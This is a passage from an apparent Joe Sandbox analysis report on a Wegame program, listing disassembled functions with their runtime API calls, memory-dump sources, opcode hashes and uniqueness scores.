                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?get_first_mac@common@ierd_tgp@@D@2@@std@@D@std@@H_prolog3H_prolog3_catch_U?$char_traits@V?$allocator@V?$basic_string@
                                                                • String ID:
                                                                • API String ID: 3954339525-0
                                                                • Opcode ID: ce5774161242e1b471ae5d5450daddf458874d0f6fc93f376b421b9f7674ab92
                                                                • Instruction ID: 1832e572d00c3b682b584d25139c3c15bec9f4af21009df58535d02ceff55f8e
                                                                • Opcode Fuzzy Hash: ce5774161242e1b471ae5d5450daddf458874d0f6fc93f376b421b9f7674ab92
                                                                • Instruction Fuzzy Hash: 01D0A9B1920209ABEF009F64C80639D7B71BF2032EF20446CE0041E0A0CBFE8B40AB80
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00467560 Relevance: 1.7, APIs: 1, Instructions: 157COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3_
                                                                • String ID:
                                                                • API String ID: 2427045233-0
                                                                • Opcode ID: 36ded811e30a1cbb18a6c0f9a1d0f398b4207daecdc98a35ca7bfe1ad1546f6c
                                                                • Instruction ID: f6ca224987c38ebb81304d7b9f1192f7435af45442e75df493d71592c8945d7f
                                                                • Opcode Fuzzy Hash: 36ded811e30a1cbb18a6c0f9a1d0f398b4207daecdc98a35ca7bfe1ad1546f6c
                                                                • Instruction Fuzzy Hash: 7751A531A04705CFCB25DF98C9919AEB7B1FF45718F24442FD002AB281E7786986CB9A
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD4A3E3 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_catch_GS.LIBCMT ref: 6BD4A3ED
                                                                  • Part of subcall function 6BD1CEF4: memmove.VCRUNTIME140(00000000,?,?,00000001,?,?,?,?,?,?,6BD1A734,?,00000004,6BD1A09E,?,1F5A0D44), ref: 6BD1CF53
                                                                  • Part of subcall function 6BD19A0E: __EH_prolog3.LIBCMT ref: 6BD19A15
                                                                  • Part of subcall function 6BD4A5B5: __EH_prolog3_GS.LIBCMT ref: 6BD4A5BF
                                                                  • Part of subcall function 6BD4A5B5: ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,00000000,?,?,?,00000000,00000200,6BD4A4EA,?,?,00000000,?,000000A0,6BD47025,?), ref: 6BD4A65F
                                                                  • Part of subcall function 6BD4A5B5: ?decode_stream@common@ierd_tgp@@YA?AV?$optional@V?$reference_wrapper@V?$basic_istringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@std@@@std@@AAV?$basic_istream@DU?$char_traits@D@std@@@4@AAV?$basic_istringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,?,?,00000001,00000001,?,00000020,00000040,00000001,?,?,?,?,00000000,00000200,6BD4A4EA), ref: 6BD4A6D3
                                                                  • Part of subcall function 6BD4A5B5: ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?), ref: 6BD4A6E2
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: U?$char_traits@$D@std@@V?$allocator@$D@2@@4@@V?$basic_istringstream@$?decode_stream@common@ierd_tgp@@?get_log_instance@base@@?u16to8@common@ierd_tgp@@D@2@@std@@@std@@@std@@D@std@@@4@H_prolog3H_prolog3_H_prolog3_catch_Logger@1@U?$char_traits@_V?$allocator@_V?$basic_istream@V?$basic_string@V?$basic_string@_V?$optional@V?$reference_wrapper@W@2@@std@@W@std@@memmove
                                                                • String ID:
                                                                • API String ID: 3116802981-0
                                                                • Opcode ID: 86b03f217ea3d63282b81103562b00f49cdb15cf1e0c9fca6ea2f5b348868210
                                                                • Instruction ID: cbc908666f492ba2aa073b8ef1b574ef1d4d71eaa6ece1b1daa76690e121b717
                                                                • Opcode Fuzzy Hash: 86b03f217ea3d63282b81103562b00f49cdb15cf1e0c9fca6ea2f5b348868210
                                                                • Instruction Fuzzy Hash: 2051A03080524CEECF05DBB4C991BDDBBB4AF26328F4441A9E049AF091DB785B49DB21
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BE14E80 Relevance: 1.6, APIs: 1, Instructions: 102COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,?,6BE1592B,00000000,00000000,?,?,?,00000000,?,00000000,?,?,00000000,?), ref: 6BE14EE1
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                • String ID:
                                                                • API String ID: 3668304517-0
                                                                • Opcode ID: 25600ba7ac19ac4d8f22c089c189427de0450b7964f9582ac200611c3fbd0ac5
                                                                • Instruction ID: c9c36c1936838717e3996688e2ac16daca006518463aaf0f1a061a70e8f682f1
                                                                • Opcode Fuzzy Hash: 25600ba7ac19ac4d8f22c089c189427de0450b7964f9582ac200611c3fbd0ac5
                                                                • Instruction Fuzzy Hash: E92120B39005215BD7108E2CD880799F3B5EF4436CF32425AEC78AB780D738EAA08BD4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD2A76F Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD2A776
                                                                  • Part of subcall function 6BD2A733: __EH_prolog3.LIBCMT ref: 6BD2A73A
                                                                  • Part of subcall function 6BD2A733: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(00000004,6BD2A7D7,00000003,00000024,6BDBA75E,create_directory_ex fail, error code:%1%, path:%2%), ref: 6BD2A744
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ??0?$basic_streambuf@D@std@@@std@@H_prolog3H_prolog3_U?$char_traits@
                                                                • String ID:
                                                                • API String ID: 4027586451-0
                                                                • Opcode ID: 09e981485aa9c018bfddb03540e60afd5ad1d699237aa5137457381a229bc973
                                                                • Instruction ID: 9ba3fed47acb905da43444f3f9e722f73ea543624a8ffb9cca920e4184da47b6
                                                                • Opcode Fuzzy Hash: 09e981485aa9c018bfddb03540e60afd5ad1d699237aa5137457381a229bc973
                                                                • Instruction Fuzzy Hash: 1B3147B0C05784CECB21CFAAC18429DFFF0BF19314FA481AEC099AB691C374A605CB65
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0043F4BB Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_catch_GS.LIBCMT ref: 0043F4C2
                                                                  • Part of subcall function 0043F72C: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,00000000,?), ref: 0043F74B
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3_catch___stdio_common_vsprintf
                                                                • String ID:
                                                                • API String ID: 2700776485-0
                                                                • Opcode ID: 8dbeb39b95c638acc57ecb78872740aab6b4c20124cc7ddaabd9e662f5d57779
                                                                • Instruction ID: 009e356efe37c53d668e1e5936b1339c3b58d43ffff98d3be8479f11063d246f
                                                                • Opcode Fuzzy Hash: 8dbeb39b95c638acc57ecb78872740aab6b4c20124cc7ddaabd9e662f5d57779
                                                                • Instruction Fuzzy Hash: 6C115471D00149EBCF01DFAAC8915DEB7B4BF18314F94856EE02567142E7345A09CB65
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD1E945 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_catch_GS.LIBCMT ref: 6BD1E94C
                                                                  • Part of subcall function 6BD1FB37: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00000000,00000000,?,?,6BD1E9A3,?,?,?,00000010,?,00000000,00000020), ref: 6BD1FB56
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3_catch___stdio_common_vsprintf
                                                                • String ID:
                                                                • API String ID: 2700776485-0
                                                                • Opcode ID: df518d40707a6a24ffb742b056684b84295f2e1f269560ec311697a9515819a6
                                                                • Instruction ID: e118a3d19f8e7d91c7595aff78d5db6ed5b217be1c7bb8ae6b34bc3c1ff5dd23
                                                                • Opcode Fuzzy Hash: df518d40707a6a24ffb742b056684b84295f2e1f269560ec311697a9515819a6
                                                                • Instruction Fuzzy Hash: 17113772C04249DBDF01DFB8D8919DEBBB4BF18224FA08069D121AB151DB389B08DBA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BE3DE60 Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: closesocket
                                                                • String ID:
                                                                • API String ID: 2781271927-0
                                                                • Opcode ID: a447a25ba20c81eb41917cc1bc966eaacec2a391da9913e400c94c396145ce26
                                                                • Instruction ID: b2b122fbf4b6cb1f982d7523337411f2ebf28be255b16017bd23d31666cef4c6
                                                                • Opcode Fuzzy Hash: a447a25ba20c81eb41917cc1bc966eaacec2a391da9913e400c94c396145ce26
                                                                • Instruction Fuzzy Hash: 88F0F439B041217BDB116636EC01BEABB65BF82325F20405AFA2453300C339F471C3D1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD2500D Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 6BD25014
                                                                  • Part of subcall function 6BE22DCC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,6BD1621D,0000002C,0000000C,6BD15702,00000004,6BD157B1,00000214), ref: 6BE22DE1
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3malloc
                                                                • String ID:
                                                                • API String ID: 266865037-0
                                                                • Opcode ID: 2468a88919b391816652b6d86a687f68255564ddf6c7d001842c7eeabea034c2
                                                                • Instruction ID: 7ccce0480ed9531dbeab34474c8f359b2a7ae752c8f2dc2c8720deb0cd3b5495
                                                                • Opcode Fuzzy Hash: 2468a88919b391816652b6d86a687f68255564ddf6c7d001842c7eeabea034c2
                                                                • Instruction Fuzzy Hash: AC012C71901249EFCF01CFA4894089EBFB1BF08714B50846EEA09AB260C735CA11EB90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD23A28 Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6BD23AE5,?,?,?), ref: 6BD23A59
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: _beginthreadex
                                                                • String ID:
                                                                • API String ID: 3014514943-0
                                                                • Opcode ID: fcb4b73a6b7571e57deac0eaab12d69269d757769499ed63efac52a59789198d
                                                                • Instruction ID: 3b53e8d59bdb2762dcf6e3651a938c4fab2f16dd0898e1e70ca7b2b137599e06
                                                                • Opcode Fuzzy Hash: fcb4b73a6b7571e57deac0eaab12d69269d757769499ed63efac52a59789198d
                                                                • Instruction Fuzzy Hash: EFF09676554505BF9714CF29CC41857F7E8FE85378310C73AA529C7650E730E05587E8
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD367C2 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 6BD367C9
                                                                  • Part of subcall function 6BD3684F: memset.VCRUNTIME140 ref: 6BD36880
                                                                  • Part of subcall function 6BD3A075: __EH_prolog3_GS.LIBCMT ref: 6BD3A07C
                                                                  • Part of subcall function 6BD3A075: _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,0000001C,6BD36841), ref: 6BD3A097
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3H_prolog3__time64memset
                                                                • String ID:
                                                                • API String ID: 3469414599-0
                                                                • Opcode ID: 3f1d8fd3aabb1cffd49d1809b25d6ba0064378fe16c8755cd184b9279d5e6cd6
                                                                • Instruction ID: 2fdfb4397caea18b9f7322732d4092504142f682d90e89edaf4602e821e41748
                                                                • Opcode Fuzzy Hash: 3f1d8fd3aabb1cffd49d1809b25d6ba0064378fe16c8755cd184b9279d5e6cd6
                                                                • Instruction Fuzzy Hash: D9011771919B80CAC725DF7984916CAFFF1BF29310F54896FD1EA9B252C370A604CB62
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD329BB Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3_
                                                                • String ID:
                                                                • API String ID: 2427045233-0
                                                                • Opcode ID: f8f4a6c97e3a911ae5c5912d56cb80c8408a99c9c5184409d6666c36d325e6ce
                                                                • Instruction ID: bf2f355dde223ee5365b2f3fd491116f0b6cc93ae7453497cf0d6312f712d7bd
                                                                • Opcode Fuzzy Hash: f8f4a6c97e3a911ae5c5912d56cb80c8408a99c9c5184409d6666c36d325e6ce
                                                                • Instruction Fuzzy Hash: 66010075901208EFCF04DFA4E8819DDBBB2FF49320F208059E925AB3A0C734AA11DF60
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD3444F Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 6BD34456
                                                                  • Part of subcall function 6BE22DCC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,6BD1621D,0000002C,0000000C,6BD15702,00000004,6BD157B1,00000214), ref: 6BE22DE1
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3malloc
                                                                • String ID:
                                                                • API String ID: 266865037-0
